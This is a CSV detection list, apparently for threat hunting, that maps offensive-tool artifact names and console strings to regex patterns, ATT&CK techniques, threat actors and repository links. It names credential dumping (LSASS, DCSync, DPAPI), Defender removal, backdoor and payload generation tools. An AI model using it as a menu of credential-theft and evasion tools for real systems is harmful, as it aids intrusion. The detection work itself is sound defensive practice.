"*] Using KohPipe    *",".{0,1000}\]\sUsing\sKohPipe\s\s\s\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#content","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","20094"
"*] Will decrypt user masterkeys with NTLM hash: *",".{0,1000}\]\sWill\sdecrypt\suser\smasterkeys\swith\sNTLM\shash\:\s.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","20095"
"*] Writing obfuscated payload to *",".{0,1000}\]\sWriting\sobfuscated\spayload\sto\s.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20096"
"*] Wrote hijack DLL to *",".{0,1000}\]\sWrote\shijack\sDLL\sto\s.{0,1000}","offensive_tool_keyword","cobaltstrike","cobaltstrike default content strings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","20097"
"*] You would like to generate .EXE using lauch4j? (y/n):*",".{0,1000}\]\sYou\swould\slike\sto\sgenerate\s\.EXE\susing\slauch4j\?\s\(y\/n\)\:.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","20098"
"*]Spawning Process with Spoofed Parent*",".{0,1000}\]Spawning\sProcess\swith\sSpoofed\sParent.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","20099"
"*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","20103"
"*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","20104"
"*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","20105"
"*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","20106"
"*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","20107"
"*_adAclOutput*.xlsx*",".{0,1000}_adAclOutput.{0,1000}\.xlsx.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","20108"
"*_backdoor.exe*",".{0,1000}_backdoor\.exe.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","20109"
"*_backdoor.rb*",".{0,1000}_backdoor\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20110"
"*_BloodHound.zip*",".{0,1000}_BloodHound\.zip.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20111"
"*_cobaltstrike*",".{0,1000}_cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20113"
"*_dcsync.txt*",".{0,1000}_dcsync\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","20114"
"*_DefenderRemover.exe*",".{0,1000}_DefenderRemover\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","20115"
"*_DefenderRemover-x86.exe*",".{0,1000}_DefenderRemover\-x86\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","20116"
"*_dns_hijack/*.js*",".{0,1000}_dns_hijack\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","20117"
"*_dns_hijack/*.rb*",".{0,1000}_dns_hijack\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","20118"
"*_DomainPasswordAuditReport.html*",".{0,1000}_DomainPasswordAuditReport\.html.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","20119"
"*_dump_users.lst*",".{0,1000}_dump_users\.lst.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","20120"
"*_DumpLSASecrets*",".{0,1000}_DumpLSASecrets.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","20121"
"*_enum_vault_creds*",".{0,1000}_enum_vault_creds.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","20122"
"*_EvilClippy.*",".{0,1000}_EvilClippy\..{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","20123"
"*_execve_binsh.s*",".{0,1000}_execve_binsh\.s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20124"
"*_find_sharpgen_dll*",".{0,1000}_find_sharpgen_dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","20125"
"*_generate_bind_payloads_password*",".{0,1000}_generate_bind_payloads_password.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","20126"
"*_generate_scramblesuit_passwd*",".{0,1000}_generate_scramblesuit_passwd.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","20127"
"*_GetNetLoggedon.py*",".{0,1000}_GetNetLoggedon\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","20128"
"*_GetPrivilege_SEDEBUG.au3*",".{0,1000}_GetPrivilege_SEDEBUG\.au3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20129"
"*_iepv.zip.*",".{0,1000}_iepv\.zip\..{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20130"
"*_impacket*.tar.gz*",".{0,1000}_impacket.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","20131"
"*_KIWI_BCRYPT_HANDLE_KEY*",".{0,1000}_KIWI_BCRYPT_HANDLE_KEY.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","20132"
"*_KIWI_BCRYPT_KEY*",".{0,1000}_KIWI_BCRYPT_KEY.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","20133"
"*_KIWI_BCRYPT_KEY81*",".{0,1000}_KIWI_BCRYPT_KEY81.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","20134"
"*_KIWI_MASTERKEY_CACHE_ENTRY*",".{0,1000}_KIWI_MASTERKEY_CACHE_ENTRY.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","20135"
"*_lfi_rce.rb*",".{0,1000}_lfi_rce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20136"
"*_lsass.txt*",".{0,1000}_lsass\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","20137"
"*_lsassdecrypt.py*",".{0,1000}_lsassdecrypt\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","20138"
